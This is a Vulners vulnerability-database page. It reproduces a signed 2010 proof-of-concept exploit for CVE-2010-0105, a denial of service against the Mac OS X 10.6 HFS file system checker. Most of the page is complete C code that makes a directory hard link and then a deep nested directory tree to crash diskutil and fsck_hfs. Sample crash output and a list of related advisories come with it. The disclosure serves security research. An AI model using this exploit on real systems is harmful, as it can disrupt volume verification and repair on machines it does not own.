Vulners
Lucene search
MacOS X 10.6 HFS File System Attack (Denial of Service)
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability | 24 Apr 201000:00 | – | zdt |
| MacOS X 10.9 Hard Link Memory Corruption | 8 Apr 201400:00 | – | zdt |
| Mac OS X 10.11 FTS Deep Structure of the File System Buffer Overflow Exploit | 8 Dec 201500:00 | – | zdt |
 | Mac OS X 10.6 < 10.6.5 Multiple Vulnerabilities | 11 Nov 201000:00 | – | nessus |
| Mac OS X 10.6 < 10.6.5 Multiple Vulnerabilities | 11 Nov 201000:00 | – | nessus |
| Mac OS X 10.6.x < 10.6.5 Multiple Vulnerabilities | 10 Nov 201000:00 | – | nessus |
| Mac OS X Multiple Vulnerabilities (Security Update 2010-007) | 10 Nov 201000:00 | – | nessus |
 | CVE-2010-0105 | 24 Apr 201000:00 | – | circl |
 | CVE-2010-0105 | 27 Apr 201015:00 | – | cve |
 | CVE-2010-0105 | 27 Apr 201015:00 | – | cvelist |
10
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/* Proof of Concept for CVE-2010-0105
MacOS X 10.6 hfs file system attack (Denial of Service)
by Maksymilian Arciemowicz from SecurityReason.com
http://securityreason.com/achievement_exploitalert/15
NOTE:
This DoS will be localized in phase
Checking multi-linked directories
So we need activate it with line
connlink("C/C","CX");
Now we need create PATH_MAX/2 directory tree to make overflow.
and we should get diskutil and fsck_hfs exit with sig=8
~ x$ diskutil verifyVolume /Volumes/max2
Started filesystem verification on disk0s3 max2
Performing live verification
Checking Journaled HFS Plus volume
Checking extents overflow file
Checking catalog file
Checking multi-linked files
Checking catalog hierarchy
Checking extended attributes file
Checking multi-linked directories
Maximum nesting of folders and directory hard links reached
The volume max2 could not be verified completely
Error: -9957: Filesystem verify or repair failed
Underlying error: 8: POSIX reports: Exec format error
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
int createdir(char *name){
if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
|S_IXUSR)){
printf("Can`t create %s", name);
exit(1);}
else
return 0;
}
int comein(char *name){
if(0!=chdir(name)){
printf("Can`t chdir in to %s", name);
exit(1);}
else
return 0;
}
int connlink(a,b)
char *a,*b;
{
if(0!=link(a,b)){
printf("Can`t create link %s => %s",a,b);
exit(1);}
else
return 0;
}
int main(int argc,char *argv[]){
int level;
FILE *fp;
if(argc==2) {
level=atoi(argv[1]);
}else{
level=512; //default
}
createdir("C"); //create hardlink
createdir("C/C"); //create hardlink
connlink("C/C","CX"); //we need use to checking multi-linked directorie
comein("C");
while(level--)
printf("Level: %i mkdir:%i chdir:%i\n",level,
createdir("C"),
comein("C"));
printf("check diskutil verifyVolume /\n");
return 0;
}
- --
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<[email protected]>
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkvTTQsACgkQpiCeOKaYa9bHwACfSRqy8xJbJBGFvLbLIjabxMkI
to4AoMMetii9Gc7EyOK7/3+QP4ynP5kY
=IML/
-----END PGP SIGNATURE-----
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Apr 2010 00:00Current
EPSS0.00319